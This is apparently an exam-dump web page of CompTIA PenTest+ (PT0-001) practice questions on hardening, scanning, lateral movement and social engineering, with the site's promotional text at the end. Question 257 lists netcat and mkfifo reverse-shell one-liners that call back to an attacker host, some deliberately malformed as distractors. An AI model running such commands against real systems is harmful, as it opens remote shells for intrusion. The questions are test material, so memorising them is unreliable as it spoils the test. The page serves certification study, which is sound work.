PT0-001 Exam Details

  • Exam Code
    :PT0-001
  • Exam Name
    :CompTIA PenTest+
  • Certification
    :CompTIA Certifications
  • Vendor
    :CompTIA
  • Total Questions
    :306 Q&As
  • Last Updated
    :Apr 01, 2024

CompTIA PT0-001 Online Questions & Answers

  • Question 251:

    An Internet-accessible database server was found with the following ports open: 22, 53, 110, 1433, and 3389. Which of the following would be the BEST hardening technique to secure the server?

    A. Ensure all protocols are using encryption.
    B. Employ network ACLs.
    C. Disable source routing on the server.
    D. Ensure the IDS rules have been updated.

  • Question 252:

    A software developer wants to test the code of an application for vulnerabilities. Which of the following processes should the software developer perform?

    A. Vulnerability scan
    B. Dynamic scan
    C. Static scan
    D. Compliance scan

  • Question 253:

    A penetration tester is able to move laterally throughout a domain with minimal roadblocks after compromising a single workstation.

    Which of the following mitigation strategies would be BEST to recommend in the report? (Select THREE).

    A. Randomize local administrator credentials for each machine.
    B. Disable remote logons for local administrators.
    C. Require multifactor authentication for all logins.
    D. Increase minimum password complexity requirements.
    E. Apply additional network access control.
    F. Enable full-disk encryption on every workstation.
    G. Segment each host into its own VLAN.

  • Question 254:

    During a full-scope security assessment, which of the following is a prerequisite to social engineer a target by physically engaging them?

    A. Locating emergency exits
    B. Preparing a pretext
    C. Shoulder surfing the victim
    D. Tailgating the victim

  • Question 255:

    A penetration tester is using the Onesixtyone tool on Kali Linux to try to exploit the SNMP protocol on a target that has SNMP enabled Which of the following types of attacks is the penetration tester performing?

    A. Buffer overflow attack
    B. Man-in-the-middle attack
    C. Dictionary-based attack
    D. Name resolution attack

  • Question 256:

    A penetration testing company is performing a penetration test against Company A. Company A has provided the IP address range 10.0.0.0/24 as its in-scope network range. During the information gathering phase, the penetration tester is asked to conduct active information-gathering techniques. Which of the following is the BEST tool to use for active information gathering?

    A. hping3
    B. theHarvester
    C. tcpdump
    D. Nmap

  • Question 257:

    During a web application assessment, a penetration tester discovers that arbitrary commands can be executed on the server. Wanting to take this attack one step further, the penetration tester begins to explore ways to gain a reverse shell back to the attacking machine at 192.168.1.5. Which of the following are possible ways to do so? (Select TWO).

    A. nc 192.168.1.5 44444
    B. nc -nlvp 4444 -e /bin/sh
    C. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>and1|nc 192.168.1.5 44444>/tmp /f
    D. nc -e /bin/sh 192.168.1.5 4444
    E. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>and1|nc 192.168.1.5 444444>/tmp /f
    F. rm /tmp/f; mkfifo /tmp/f; cat /tmp/f| /bin/sh -I 2>and1|nc 192.168.5.1 44444>/tmp /f

  • Question 258:

    A penetration tester was able to retrieve the initial VPN user domain credentials by phishing a member of the IT department. Afterward, the penetration tester obtained hashes over the VPN and easily cracked them using a dictionary attack Which of the following remediation steps should be recommended? (Select THREE)

    A. Mandate all employees take security awareness training
    B. Implement two-factor authentication for remote access
    C. Install an intrusion prevention system
    D. Increase password complexity requirements
    E. Install a security information event monitoring solution.
    F. Prevent members of the IT department from interactively logging in as administrators
    G. Upgrade the cipher suite used for the VPN solution

  • Question 259:

    A company's corporate policies state that employees are able to scan any global network as long as it is done within working hours. Government laws prohibit unauthorized scanning. Which of the following should an employee abide by?

    A. Company policies must be followed in this situation
    B. Laws supersede corporate policies
    C. Industry standards receding scanning should be followed
    D. The employee must obtain written approval from the company's Chief Information Security Officer (ClSO) prior to scanning

  • Question 260:

    A web application scanner reports that a website is susceptible to clickjacking. Which of the following techniques would BEST prove exploitability?

    A. Redirect the user with a CSRF.
    B. Launch the website in an iFRAME.
    C. Pull server headers.
    D. Capture and replay a session ID.

Tips on How to Prepare for the Exams

Nowadays, the certification exams become more and more important and required by more and more enterprises when applying for a job. But how to prepare for the exam effectively? How to prepare for the exam in a short time with less efforts? How to get a ideal result and how to find the most reliable resources? Here on Vcedump.com, you will find all the answers. Vcedump.com provide not only CompTIA exam questions, answers and explanations but also complete assistance on your exam preparation and certification application. If you are confused on your PT0-001 exam preparations and CompTIA certification application, do not hesitate to visit our Vcedump.com to find your solutions here.